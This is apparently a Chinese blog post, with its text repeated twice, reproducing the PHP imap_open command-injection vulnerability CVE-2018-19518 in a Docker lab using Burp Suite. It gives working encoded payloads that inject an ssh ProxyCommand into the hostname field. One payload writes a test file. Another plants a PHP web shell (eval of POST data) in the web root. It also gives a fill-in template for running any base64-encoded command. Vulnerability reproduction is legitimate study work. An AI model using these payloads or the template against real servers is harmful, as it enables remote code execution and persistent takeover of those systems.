1.启动环境docker-compose up -d2.访问网站http://192.168.63.156:8080/3.打开BurpSuite拦截到访问请求发送到repeater。修改请求内容hostnamex-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}usernamexxxpasswordxxx执行的命令是echo 1234567890/tmp/test0001进行base64加密后变成ZWNobyAnMTIzNDU2Nzg5MCcL3RtcC90ZXN0MDAwMQ需要转换一下(%2b);TAB(%09);(%3d)ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d完整的请求hostnamex-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}usernamexxxpasswordxxx# 原始payload x-oProxyCommandecho echo ?php eval($_POST[1]); /var/www/html/1.php|base64 -d|sh} # base64url编码以后 hostnamex-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh} # 模板 hostnamex-oProxyCommand%3decho%09【要执行命令的base64】|base64%09-d|sh}usernamexxxpasswordxxx这个请求forward以后。在bash中查看是否创建成功。执行下面命令进入环境bashsudo docker exec -it e78a02c75bd8 /bin/bash可以看到已经创建成功test0001参考https://www.bilibili.com/video/BV1k14y1L7Sj?spm_id_from333.788.videopod.episodesvd_source4677d71876ccb847909253468ef2f55cp4CVE-2018-19518 漏洞复现-CSDN博客
CVE-2018-19518PHP漏洞
发布时间:2026/7/13 2:26:25
1.启动环境docker-compose up -d2.访问网站http://192.168.63.156:8080/3.打开BurpSuite拦截到访问请求发送到repeater。修改请求内容hostnamex-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}usernamexxxpasswordxxx执行的命令是echo 1234567890/tmp/test0001进行base64加密后变成ZWNobyAnMTIzNDU2Nzg5MCcL3RtcC90ZXN0MDAwMQ需要转换一下(%2b);TAB(%09);(%3d)ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d完整的请求hostnamex-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQ%3d%3d|base64%09-d|sh}usernamexxxpasswordxxx# 原始payload x-oProxyCommandecho echo ?php eval($_POST[1]); /var/www/html/1.php|base64 -d|sh} # base64url编码以后 hostnamex-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh} # 模板 hostnamex-oProxyCommand%3decho%09【要执行命令的base64】|base64%09-d|sh}usernamexxxpasswordxxx这个请求forward以后。在bash中查看是否创建成功。执行下面命令进入环境bashsudo docker exec -it e78a02c75bd8 /bin/bash可以看到已经创建成功test0001参考https://www.bilibili.com/video/BV1k14y1L7Sj?spm_id_from333.788.videopod.episodesvd_source4677d71876ccb847909253468ef2f55cp4CVE-2018-19518 漏洞复现-CSDN博客